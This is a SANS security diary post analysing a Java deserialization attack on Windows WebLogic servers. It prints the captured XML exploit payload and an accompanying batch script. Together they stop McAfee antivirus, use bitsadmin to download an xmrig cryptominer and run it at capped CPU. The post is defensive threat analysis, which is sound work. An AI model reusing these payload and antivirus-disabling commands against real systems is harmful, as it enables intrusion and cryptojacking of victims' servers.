Java Deserialization Attack Against Windows

Published: 2018-04-03
Last Updated: 2018-04-03 14:34:51 UTC
by Johannes Ullrich (Version: 1)
0 comment(s)

Recently we talked a lot about attacks exploiting Java deserialization vulnerabilties in systems like Apache SOLR and WebLogic. Most of these attacks targeted Linux/Unix systems. But recently, I am seeing more attacks that target windows. For example:

<soapenv:Envelope xmlns:soapenv="">
    <work:WorkContext xmlns:work="">
        <object class="java.lang.ProcessBuilder">
          <array class="java.lang.String" length="3" >
            <void index="0">
            <void index="1">
            <void index="2">
              <string>net stop "McAfee McShield;net stop mcafeeframework;bitsadmin.exe /transfer "xmrig.bat" /download /priority foreground "%cd%\xmrig.bat";bitsadmin.exe /transfer "xmrig.exe" /download /priority foreground "%cd%\xmrig.exe;dir xmrig*;xmrig.bat;tasklist;</string>
          <void method="start"/>

The actual payload:

Turn off McAfee Antivirus (I am not sure what they only turn off McAfee. Any ideas?)

net stop "McAfee McShield;
net stop mcafeeframework;

Use bitsadmin to download the cryptominer and a batch file to start it from GitHub

bitsadmin.exe /transfer "xmrig.bat" /download /priority foreground "%cd%\xmrig.bat";
bitsadmin.exe /transfer "xmrig.exe" /download /priority foreground "%cd%\xmrig.exe;
dir xmrig*;

The Batch file:

taskkill /im /f xmrig.exe /t
net stop "McAfee McShield"
net stop mcafeeframework
xmrig.exe -o -u 42jF56tc85UTZwhMQc6rHbMHTxHqK74qS2zqLyRZxLbwegsy7FJ9w4T5B69Ay5qeMEMuvVDwHNeopAxrEZkkHrMb5phovJ6 -p x --background --max-cpu-usage=50 --donate-level=1

First, it kills other xmrig processes (competition?) . Next, it again turns of McAfee. It then starts the miner and connects to the pool on port 3333. It only uses 50% of the CPU usage, likely to evade detection.

So far, this miner only "owns" about 350 Hashes/Second, and made a bit short of 40 Monero so far (about $ 7,000) . 


Johannes B. Ullrich, Ph.D. , Dean of Research, SANS Technology Institute

0 comment(s)


Diary Archives